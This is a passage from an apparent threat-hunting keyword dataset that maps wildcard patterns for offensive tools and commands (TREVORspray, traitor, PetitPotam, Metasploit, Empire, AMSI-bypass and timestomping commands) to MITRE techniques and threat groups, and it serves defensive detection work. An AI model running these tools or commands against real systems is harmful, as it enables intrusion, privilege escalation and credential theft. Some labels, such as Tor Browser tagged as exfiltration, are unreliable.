APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*TokenViewer.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*tokyoneon/Chimera*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*tomcarver16/ADSearch*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,1,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z -*tomcat_mgr_default_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*tomcat-rootprivesc-deb.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*tomcatWarDeployer -v -x -p * -H * ,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Tool-PassView*,offensive_tool_keyword,Tool-PassView,Password recovery or exploitation,T1003 - T1021 - T1056 - T1110 - T1212,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/password_recovery_tools.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*tools/adfind*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*tools/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*top100_sublist.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*top1000_sublist.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*Top109Million-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top12Thousand-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential 
Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top1575-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top1pt6Million-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top207-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top29Million-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top2Billion-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top304Thousand-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Top353Million-probable-v2.txt*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z 
-*topotam.exe*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*topotam/PetitPotam*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*tor_hiddenservices.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*tor_services.py*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*TORAnonymizer.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*TorBrowser-*macos_ALL.dmg*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*torbrowser-install-*_ALL.exe,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*torbrowser-install-win*.exe*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*tor-browser-linux*_ALL.tar.xz*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*torproject*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*torproject.org/dist/torbrowser/*.*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*--tor-proxy*--pwndb*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*TorPylle*,offensive_tool_keyword,TorPylle,A Python / Scapy implementation of the OR (TOR) protocol.,T1573 - T1572 - T1553 - T1041 - T1090,TA0002 - TA0040,N/A,N/A,Sniffing & Spoofing,https://github.com/cea-sec/TorPylle,1,0,N/A,N/A,1,91,23,2021-10-03T18:08:41Z,2013-07-23T11:38:39Z -*TorServiceSetup*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,0,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*totally legit pdf.pdf*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*toteslegit.ps1*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*touch -a*,greyware_tool_keyword,touch,Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.,T1070.006 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense 
Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*touch -m*,greyware_tool_keyword,touch,Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.,T1070.006 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*touch -r *,greyware_tool_keyword,touch,Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.,T1070.006 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*touch -t *,greyware_tool_keyword,touch,Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.,T1070.006 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*tplmap*,offensive_tool_keyword,tplmap,Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The sandbox break-out techniques came from James Ketts Server-Side Template Injection: RCE For The Modern Web App. other public researches [1] [2]. 
and original contributions to this tool It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python. Ruby. PHP. Java and generic unsandboxed template engines.,T1059 - T1210.001 - T1589 - T1175,TA0002 - TA0007 - TA0008 - ,N/A,N/A,Web Attacks,https://github.com/epinna/tplmap,1,0,N/A,N/A,10,3437,670,2023-08-31T14:59:40Z,2016-07-06T20:33:18Z -*trailofbits/onesixtyone*,offensive_tool_keyword,onesixtyone,Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps,T1046 - T1018,TA0007 - TA0005,N/A,N/A,Reconnaissance,https://github.com/trailofbits/onesixtyone,1,1,N/A,N/A,5,416,86,2023-04-11T18:21:38Z,2014-02-07T17:02:49Z -*trainr3kt/MemReader_BoF*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,1,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -*trainr3kt/Readfile_BoF*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/Readfile_BoF,1,1,N/A,10,10,17,4,2022-06-21T04:50:39Z,2021-04-01T03:47:56Z -*traitor -a *,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*traitor --any *,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*traitor -e *,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*traitor --exploit*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*traitor -p *,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,0,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*Transfer done (but failed to open directory).*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*tree_connect_andx_request*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*TrevorC2*,offensive_tool_keyword,trevorc2,Command and Control via Legitimate Behavior over HTTP,T1105 - T1071 - T1070,TA0011,N/A,N/A,C2,https://github.com/trustedsec/trevorc2,1,1,N/A,10,10,1100,244,2022-01-31T20:16:24Z,2017-10-27T15:59:28Z -*trevorproxy ssh*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorproxy subnet*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - 
T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorsaudi/Mshikaki*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,1,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -*trevorspray -*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray *--recon *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*trevorspray -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*trevorspray.cli*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential 
Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray.enumerators*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray.looters*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray.py*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray.sprayers*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray/existent_users.txt*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*trevorspray/valid_logins.txt*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - 
clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*TREVORspray-dev*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*TREVORspray-master*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*TREVORspray-trevorspray*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and 